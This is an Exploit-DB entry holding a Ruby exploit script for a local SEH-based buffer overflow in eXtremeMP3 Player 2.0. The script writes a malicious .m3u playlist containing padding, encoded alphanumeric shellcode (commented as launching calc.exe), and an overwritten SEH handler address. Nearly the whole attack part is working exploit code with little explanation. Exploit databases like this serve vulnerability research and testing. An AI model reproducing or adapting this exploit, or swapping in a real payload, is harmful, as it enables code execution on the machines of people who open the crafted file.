eXtremeMP3 Player - Local Buffer Overflow (SEH)

EDB-ID:

15994

CVE:

N/A

EDB Verified:

Author:

C4SS!0 G0M3S

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2011-01-15

Vulnerable App: 
#
#
#[+]Exploit Title: Exploit Bufer Overflow eXtremeMP3 Player(SEH)
#[+]Date: 01\15\2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://ukms.tucows.com/files2/xtremv20RC1.exe
#[+]Version: 2.0
#[+]Tested on: WIN-XP SP3 BRAZILIAN
#[+]CVE: N/A
#
#Create by C4SS!0 G0M3S
#WWW.INVASAO.COM.BR
#Louredo_@hotmail.com
#
#  #########     ##    #########      #########   ##     ###############
#  ########    ####    #########      #########   ##     ##           ##    
#  ##         ## ##    ##             ##          ##     ##           ## 
#  ##        ##  ##    ##             ##          ##     ##           ##
#  ##       ########## ########       ########    ##     ##           ##
#  ##            ##          ##             ##    ##     ##           ##
#  ##            ##          ##             ##    ##     ##           ##
#  ########      ##    ########      #########    ##     ##           ##
#  ########      ##    ########      #########    \/     ###############
#                                               
#Note: To Exploit Works Download Software Open The Playlist Manager Click On Playlist 
#Load select The Malicious File And Appears Ready Boom Calc
#
#
#Sorry my English I don't Epeak English
#

system("cls")
system("color 4f")
def Usage()
     puts "\n\n\n[+]Exploit: Exploit Buffer Overflow eXtremeMP3 Player"
	 puts "[+]Date: 01\\14\\2011"
	 puts "[+]Author: C4SS!0 G0M3S"
	 puts "[+]Home: www.invasao.com.br"
	 puts "[+]E-mail: Louredo_@hotmail.com"
	 puts "[+]Impact: Hich"
	 puts "[+]Tested On: WIN-XP SP3 PORTUQUESE BRAZILIAN"
     puts "[+]Version: 2.0\n"
	 puts "[+]Software: eXtremeMP3 Player\n\n" 
     puts "Note: For the Exploit Works File Must be File_Name.m3u\n\n"
end	 
	 

if ARGV.length !=1:
     Usage()
     puts "[-]Usage: "+$0+" <File Name> "
	 puts "[-]Exemple: "+$0+" file.m3u "
	 exit
end
Usage()
buffer = "\x50\x59\x83\xC1\x42\x51\x58\x50\xC3"
buffer += "\x42" * (59-buffer.length)
puts "[*]Identifying the Length of Shellcode"
sleep(1)
shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJI9KIP01YYOO3LTV2PHLXYR"+
"TQ4KDNQENPXVQT828MSM8KL5SRXSXKDK5VPCHOLU59YBXOFWSKEL384NNCM4BNJWJ7B5LOO52ZM5MPTN"+  #SHELLCODE ALPHA UPPERCASE BASEADDRESS [EAX]
"5E6GYWQZGLVU0L5RQYZ36P5ZUEDYWCLKKEK5URKZPWW9MG8KMGR08UKNBKXXCJWGKSJXOPL0OQ3N3PSN"+   #SHELLCODE WinExec("CALC.EXE",0)	
"D0WZW9HGKK3LNK3UOV70SSTPQOQ6SXMJUXFKE9QSNLXZUNJJQ35OXWVLY7MWK9PN9KNV1CQH6DN6OMU4"+
"YLGOG2XVOPYLPSKN7UU3OKXSK8JA"
puts "[*]The Length is Shellcode:#{shellcode.length}"
sleep(1)
buffer += shellcode
buffer += "\x43" * (4097-buffer.length)

nseh = "\xcc\xcc\xcc\xcc"
seh = [0x7CE1B9C6].pack('V')#POPAD / JMP EAX
junk = "ABCDEFGHIJKLMNOPQRSTUVXZ"



payload = buffer+nseh+seh+junk

file = ARGV[0]
head = "http://"+payload

op = "w"
puts "[*]Creating the Archive #{file}"
sleep(1)
begin
     f = File.open(file,op)
     f.puts head
     f.close()
	 puts "[*]The Archive was Created #{file} Success"
	 sleep(1)
rescue
     puts "ERROR TO CREATE THE FILE"+file
end
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services